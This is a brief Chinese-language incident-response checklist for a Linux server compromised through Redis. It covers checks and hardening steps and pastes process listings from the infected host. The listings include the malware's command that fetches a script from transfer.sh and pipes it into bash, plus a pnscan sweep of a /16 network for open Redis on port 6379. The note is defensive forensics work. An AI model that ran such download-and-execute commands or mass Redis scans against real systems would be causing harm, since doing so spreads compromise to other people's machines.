1. tmp 目錄下面
2. 定時任務查找一下 crontab -e
3. 病毒要下載 ps -ef|egrep "curl|wget" 查看是否有下載的命令
4. top 一下看一下哪個占用cpu最高
5. 查找目標文件 find / -perm 777 目錄下777 權限的文件
6. /etc/passwd下面的文件用戶哪些可以登錄,去掉不正常的可以登錄用戶/bin/bash
7.查看 /etc/rc.local 用戶下面的開機自啟動
8. 查看密鑰是否被人動了,刪除密鑰沒用的.redis中毒后果.
應對 :
1. cat /etc/hosts.allow 文件設置登錄sshd的IP設置.
2.chattr +i 鎖定 定時任務 鎖定/root/.ssh/auth_key等文件
鎖定 /etc/passwd文件
[root@localhost tmp]# ps -ef |grep pnscan
root 29073 5659 10 14:07 ? 00:00:02 /usr/local/bin/pnscan -t512 -R 6f 73 3a 4c 69 6e 75 78 -W 2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a 31.105.0.0/16 6379
root 30141 4684 0 14:07 pts/1 00:00:00 grep pnscan
[root@localhost tmp]# ps -ef|egrep curl
root 5655 5653 0 Apr27 ? 00:00:00 /bin/sh -c curl -s https://transfer.sh/3EqNx/tmp.GewSw5ccS1 > .cmd && bash .cmd
root 7838 4684 0 13:56 pts/1 00:00:00 egrep curl